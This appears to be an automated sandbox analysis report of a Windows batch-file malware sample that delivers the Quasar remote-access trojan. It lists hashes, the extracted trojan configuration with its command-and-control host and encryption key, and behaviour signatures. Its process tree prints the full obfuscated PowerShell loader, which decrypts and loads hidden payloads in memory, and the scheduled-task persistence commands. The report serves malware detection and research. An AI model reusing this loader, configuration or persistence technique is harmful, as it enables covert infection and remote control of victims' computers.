Analysis
-
max time kernel
35s -
max time network
36s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
21-04-2024 01:20
Static task
static1
General
-
Target
Uni.bat
-
Size
1.8MB
-
MD5
14516087f9549022d5582272910428b1
-
SHA1
53324370839fa1c07bfa42cf7cb3039513805d42
-
SHA256
745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
-
SHA512
cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
SSDEEP
24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy
Malware Config
Extracted
quasar
1.4.1
SLAVE
uk2.localto.net:39077
cc0a2b76-665e-4e16-b318-5ee02270fbcd
-
encryption_key
D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5
-
install_name
UpdateHost.exe
-
log_directory
Error Logs
-
reconnect_delay
3000
-
startup_key
WOS64
-
subdirectory
Windows
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmp family_quasar -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
Processes:
UpdateHost.exepid process 764 UpdateHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-355664440-2199602304-1223909400-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exeUpdateHost.exepid process 4780 powershell.exe 4780 powershell.exe 4496 powershell.exe 4496 powershell.exe 4960 powershell.exe 4960 powershell.exe 764 UpdateHost.exe 764 UpdateHost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeIncreaseQuotaPrivilege 4496 powershell.exe Token: SeSecurityPrivilege 4496 powershell.exe Token: SeTakeOwnershipPrivilege 4496 powershell.exe Token: SeLoadDriverPrivilege 4496 powershell.exe Token: SeSystemProfilePrivilege 4496 powershell.exe Token: SeSystemtimePrivilege 4496 powershell.exe Token: SeProfSingleProcessPrivilege 4496 powershell.exe Token: SeIncBasePriorityPrivilege 4496 powershell.exe Token: SeCreatePagefilePrivilege 4496 powershell.exe Token: SeBackupPrivilege 4496 powershell.exe Token: SeRestorePrivilege 4496 powershell.exe Token: SeShutdownPrivilege 4496 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeSystemEnvironmentPrivilege 4496 powershell.exe Token: SeRemoteShutdownPrivilege 4496 powershell.exe Token: SeUndockPrivilege 4496 powershell.exe Token: SeManageVolumePrivilege 4496 powershell.exe Token: 33 4496 powershell.exe Token: 34 4496 powershell.exe Token: 35 4496 powershell.exe Token: 36 4496 powershell.exe Token: SeIncreaseQuotaPrivilege 4496 powershell.exe Token: SeSecurityPrivilege 4496 powershell.exe Token: SeTakeOwnershipPrivilege 4496 powershell.exe Token: SeLoadDriverPrivilege 4496 powershell.exe Token: SeSystemProfilePrivilege 4496 powershell.exe Token: SeSystemtimePrivilege 4496 powershell.exe Token: SeProfSingleProcessPrivilege 4496 powershell.exe Token: SeIncBasePriorityPrivilege 4496 powershell.exe Token: SeCreatePagefilePrivilege 4496 powershell.exe Token: SeBackupPrivilege 4496 powershell.exe Token: SeRestorePrivilege 4496 powershell.exe Token: SeShutdownPrivilege 4496 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeSystemEnvironmentPrivilege 4496 powershell.exe Token: SeRemoteShutdownPrivilege 4496 powershell.exe Token: SeUndockPrivilege 4496 powershell.exe Token: SeManageVolumePrivilege 4496 powershell.exe Token: 33 4496 powershell.exe Token: 34 4496 powershell.exe Token: 35 4496 powershell.exe Token: 36 4496 powershell.exe Token: SeIncreaseQuotaPrivilege 4496 powershell.exe Token: SeSecurityPrivilege 4496 powershell.exe Token: SeTakeOwnershipPrivilege 4496 powershell.exe Token: SeLoadDriverPrivilege 4496 powershell.exe Token: SeSystemProfilePrivilege 4496 powershell.exe Token: SeSystemtimePrivilege 4496 powershell.exe Token: SeProfSingleProcessPrivilege 4496 powershell.exe Token: SeIncBasePriorityPrivilege 4496 powershell.exe Token: SeCreatePagefilePrivilege 4496 powershell.exe Token: SeBackupPrivilege 4496 powershell.exe Token: SeRestorePrivilege 4496 powershell.exe Token: SeShutdownPrivilege 4496 powershell.exe Token: SeDebugPrivilege 4496 powershell.exe Token: SeSystemEnvironmentPrivilege 4496 powershell.exe Token: SeRemoteShutdownPrivilege 4496 powershell.exe Token: SeUndockPrivilege 4496 powershell.exe Token: SeManageVolumePrivilege 4496 powershell.exe Token: 33 4496 powershell.exe Token: 34 4496 powershell.exe Token: 35 4496 powershell.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exedescription pid process target process PID 2028 wrote to memory of 4780 2028 cmd.exe powershell.exe PID 2028 wrote to memory of 4780 2028 cmd.exe powershell.exe PID 4780 wrote to memory of 4496 4780 powershell.exe powershell.exe PID 4780 wrote to memory of 4496 4780 powershell.exe powershell.exe PID 4780 wrote to memory of 2884 4780 powershell.exe WScript.exe PID 4780 wrote to memory of 2884 4780 powershell.exe WScript.exe PID 2884 wrote to memory of 2060 2884 WScript.exe cmd.exe PID 2884 wrote to memory of 2060 2884 WScript.exe cmd.exe PID 2060 wrote to memory of 4960 2060 cmd.exe powershell.exe PID 2060 wrote to memory of 4960 2060 cmd.exe powershell.exe PID 4960 wrote to memory of 3368 4960 powershell.exe schtasks.exe PID 4960 wrote to memory of 3368 4960 powershell.exe schtasks.exe PID 4960 wrote to memory of 764 4960 powershell.exe UpdateHost.exe PID 4960 wrote to memory of 764 4960 powershell.exe UpdateHost.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_539_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_539.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_539.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_539.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_539.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_539.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD54d2c8d8bf93f9450f044c6ef5dff215a
SHA14d6ecc646ee6c124aaf7535c1387445e02734750
SHA256e77daf5c774ba87a166ccd95c40a7211f605316321e1d421b82fb0fc8ed75eb0
SHA512c75903513f87ba5fb4da3e19b079be8ba1f451e1f503ed9fdcf3dee82ce9605b87af560a120156a09b3842cdf0c42fb20f7c8cd242e3021d644e959c8536c0aa
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w0cqajya.fyu.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Users\Admin\AppData\Roaming\startup_str_539.batFilesize
1.8MB
MD514516087f9549022d5582272910428b1
SHA153324370839fa1c07bfa42cf7cb3039513805d42
SHA256745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e
SHA512cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f
-
C:\Users\Admin\AppData\Roaming\startup_str_539.vbsFilesize
115B
MD5335912c92f960bed6de5a2807d0c06e8
SHA10fc47a61e5ebaf37a0d9b147811b7fcf3f6bdfb5
SHA256fff158e9c023a9497f4d3379766720928d815cdf3bf48ea947f51d9db3c8f6ea
SHA512f0b7cf73a094d5765431e18ae71d5084d62aa392676342a3b197e98297f43c8ffa3a086406b568eda5cf3b4864fd192253602fc0baa9153599beb99252b657a6
-
memory/764-76-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/764-71-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmpFilesize
64KB
-
memory/764-70-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/764-72-0x0000020EA0390000-0x0000020EA03D4000-memory.dmpFilesize
272KB
-
memory/764-73-0x0000020EA06B0000-0x0000020EA0726000-memory.dmpFilesize
472KB
-
memory/764-77-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmpFilesize
64KB
-
memory/764-78-0x0000020E9E1D0000-0x0000020E9E1E0000-memory.dmpFilesize
64KB
-
memory/4496-16-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/4496-27-0x000002257E830000-0x000002257E840000-memory.dmpFilesize
64KB
-
memory/4496-28-0x000002257E830000-0x000002257E840000-memory.dmpFilesize
64KB
-
memory/4496-31-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/4496-17-0x000002257E830000-0x000002257E840000-memory.dmpFilesize
64KB
-
memory/4780-12-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmpFilesize
64KB
-
memory/4780-53-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/4780-14-0x000002AFED280000-0x000002AFED3D8000-memory.dmpFilesize
1.3MB
-
memory/4780-13-0x000002AFED040000-0x000002AFED048000-memory.dmpFilesize
32KB
-
memory/4780-11-0x000002AFEAD10000-0x000002AFEAD20000-memory.dmpFilesize
64KB
-
memory/4780-10-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/4780-5-0x000002AFED050000-0x000002AFED072000-memory.dmpFilesize
136KB
-
memory/4960-54-0x00000257BB840000-0x00000257BBB64000-memory.dmpFilesize
3.1MB
-
memory/4960-55-0x00000257B92C0000-0x00000257B92D0000-memory.dmpFilesize
64KB
-
memory/4960-51-0x00000257B92C0000-0x00000257B92D0000-memory.dmpFilesize
64KB
-
memory/4960-50-0x00000257B92C0000-0x00000257B92D0000-memory.dmpFilesize
64KB
-
memory/4960-46-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB
-
memory/4960-74-0x00007FF976AA0000-0x00007FF977561000-memory.dmpFilesize
10.8MB